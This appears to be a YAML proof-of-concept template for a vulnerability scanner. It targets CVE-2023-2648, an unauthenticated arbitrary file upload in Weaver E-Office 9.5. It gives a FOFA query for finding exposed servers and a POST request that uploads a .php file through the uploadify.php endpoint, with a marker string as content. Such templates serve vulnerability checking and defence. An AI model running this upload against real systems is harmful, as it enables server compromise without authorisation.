product: 泛微 E-Office
vName: 泛微E-Office uploadify.php文件上传
type: 文件上传
vID:
  - CVE-2023-2648
level: 3
vDesc: 由于泛微e-office 9.5版本源文件/inc/jquery/uploadify/uploadify.php存在问题，对参数Filedata的操作会导致不受限制的上传，未经身份验证的恶意攻击者通过上传恶意文件，从而获取目标服务器的控制权限。
version: 泛微 E-Office 9.5
note: ''
search:
  FOFA: app="泛微-EOffice"
protocol: http
link: https://blog.csdn.net/qq_41904294/article/details/130832416
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /inc/jquery/uploadify/uploadify.php
      file:
        Filedata:
          - 52e039302a62d077.php
          - 95cc64dd2825f9df13ec4ad683ecf339
          - application/octet-stream
        file:
          - ''
          - ''
          - application/octet-stream
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          header:
            value:
              - text/html
            logic: and